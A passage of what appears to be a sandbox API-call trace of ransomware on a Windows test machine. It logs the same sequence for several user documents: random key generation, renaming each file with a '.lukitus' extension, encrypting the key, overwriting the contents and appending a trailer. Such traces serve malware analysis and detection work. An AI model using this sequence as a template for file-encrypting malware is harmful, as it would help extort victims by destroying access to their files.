(lpFileName="c:\\Users\\aETAdzjz\\Documents\\Te2yCCyBh24.odp" (normalized: "c:\\users\\aetadzjz\\documents\\te2yccybh24.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.980] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Te2yCCyBh24.odp" (normalized: "c:\\users\\aetadzjz\\documents\\te2yccybh24.odp"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-A9142EC9-2EFEBC30ADE8.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-a9142ec9-2efebc30ade8.lukitus"), dwFlags=0x9) returned 1 [0106.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.982] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.989] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14ab7, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14ab7, lpOverlapped=0x0) returned 1 [0106.990] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.990] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14ab7, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14ab7, lpOverlapped=0x0) returned 1 [0106.990] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.990] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63cb4710, dwHighDateTime=0x1d31760)) [0106.990] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.990] FlushFileBuffers (hFile=0x324) returned 1 [0106.993] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\mUJ7Tow.xls" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\muj7tow.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bba3a70, ftCreationTime.dwHighDateTime=0x1d2fa23, ftLastAccessTime.dwLowDateTime=0x76819ff0, ftLastAccessTime.dwHighDateTime=0x1d2ff0d, ftLastWriteTime.dwLowDateTime=0x76819ff0, ftLastWriteTime.dwHighDateTime=0x1d2ff0d, nFileSizeHigh=0x0, nFileSizeLow=0x112f4)) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.994] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\mUJ7Tow.xls" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\muj7tow.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.994] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\mUJ7Tow.xls" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\muj7tow.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\F56924BE-9663-41BB-D65A438B-83DFABBB8CED.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\alldt37so 5xcj\\f56924be-9663-41bb-d65a438b-83dfabbb8ced.lukitus"), dwFlags=0x9) returned 1 [0107.003] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.003] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.010] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x112f4, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x112f4, lpOverlapped=0x0) returned 1 [0107.010] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.010] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x112f4, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x112f4, lpOverlapped=0x0) returned 1 [0107.011] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63cda870, dwHighDateTime=0x1d31760)) [0107.011] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.011] FlushFileBuffers (hFile=0x324) returned 1 [0107.045] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\iGbKMT66Nt d OO.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\igbkmt66nt d oo.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ceeb10, ftCreationTime.dwHighDateTime=0x1d2ffeb, ftLastAccessTime.dwLowDateTime=0x6e7aa0d0, ftLastAccessTime.dwHighDateTime=0x1d30300, ftLastWriteTime.dwLowDateTime=0x6e7aa0d0, ftLastWriteTime.dwHighDateTime=0x1d30300, nFileSizeHigh=0x0, nFileSizeLow=0xbca1)) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.045] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\iGbKMT66Nt d OO.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\igbkmt66nt d oo.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.045] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\iGbKMT66Nt d OO.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\igbkmt66nt d oo.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-BB96571E-96BBD2C0A8B9.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-bb96571e-96bbd2c0a8b9.lukitus"), dwFlags=0x9) returned 1 [0107.047] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.047] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.053] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xbca1, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xbca1, lpOverlapped=0x0) returned 1 [0107.054] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.054] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xbca1, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xbca1, lpOverlapped=0x0) returned 1 [0107.054] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.054] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63d4cc90, dwHighDateTime=0x1d31760)) [0107.054] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.055] FlushFileBuffers (hFile=0x324) returned 1 [0107.059] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\OwJVc55xap.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\owjvc55xap.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a46600, ftCreationTime.dwHighDateTime=0x1d2f60c, ftLastAccessTime.dwLowDateTime=0x6abb33f0, ftLastAccessTime.dwHighDateTime=0x1d2fc12, ftLastWriteTime.dwLowDateTime=0x6abb33f0, ftLastWriteTime.dwHighDateTime=0x1d2fc12, nFileSizeHigh=0x0, nFileSizeLow=0x16a26)) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.059] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.060] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\OwJVc55xap.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\owjvc55xap.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.060] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\OwJVc55xap.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\owjvc55xap.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-41FC6DD4-65A22D7F605C.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-41fc6dd4-65a22d7f605c.lukitus"), dwFlags=0x9) returned 1 [0107.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.061] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.067] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16a26, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16a26, lpOverlapped=0x0) returned 1 [0107.068] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.068] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16a26, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16a26, lpOverlapped=0x0) returned 1 [0107.068] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63d72df0, dwHighDateTime=0x1d31760)) [0107.069] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.069] FlushFileBuffers (hFile=0x324) returned 1 [0107.072] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\g3uu.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\g3uu.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505fc1b0, ftCreationTime.dwHighDateTime=0x1d2fd66, ftLastAccessTime.dwLowDateTime=0xe3271360, ftLastAccessTime.dwHighDateTime=0x1d2f693, ftLastWriteTime.dwLowDateTime=0xe3271360, ftLastWriteTime.dwHighDateTime=0x1d2f693, nFileSizeHigh=0x0, nFileSizeLow=0xa743)) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.072] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\g3uu.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\g3uu.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.073] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\g3uu.odt" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\g3uu.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\F56924BE-9663-41BB-6C56A97B-E7E6A4AA125B.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\f56924be-9663-41bb-6c56a97b-e7e6a4aa125b.lukitus"), dwFlags=0x9) returned 1 [0107.074] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.074] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.079] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa743, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa743, lpOverlapped=0x0) returned 1 [0107.080] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.080] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa743, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa743, lpOverlapped=0x0) returned 1 [0107.080] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, 